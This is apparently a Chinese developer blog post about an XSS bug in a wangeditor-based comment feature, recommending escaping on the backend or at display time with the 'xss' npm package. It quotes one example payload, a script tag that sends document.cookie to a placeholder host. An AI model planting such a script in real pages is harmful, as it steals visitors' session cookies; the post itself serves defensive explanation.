bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
IT_陈寒12 小时前
SpringBoot自动配置的坑,我的Bean怎么不生效?
前端·人工智能·后端
迷途呀12 小时前
新闻头条后端:新闻缓存模块
前端·redis·python·缓存·fastapi
糖墨夕13 小时前
第一章:为什么你要学 AI Agent?—— 从"切图仔"到全栈的进化之路
前端·javascript·vue.js
随风一样自由13 小时前
【前端+Canvas+航天】长征十号乙火箭回收全流程动画
前端·canvas·长征十号乙
CappuccinoRose13 小时前
CSS、Less、Sass(含 SCSS)、Stylus
前端·css·less·sass·stylus
不听话坏1 天前
Ignition篇(下 一) 动态执行前的事情
开发语言·前端·javascript
likeyi071 天前
require 和 import的区别
开发语言·前端
pany1 天前
做 AI 友好的开源 Vue3 模板 🌈
前端·vue.js·ai编程
小二·1 天前
React 19 + Next.js 15 现代前端开发实战:App Router / Server Components / 流式渲染
前端·javascript·react.js
谙忆10241 天前
前端图片直传对象存储:OSS/S3 预签名 URL、STS 临时凭证与回调校验
前端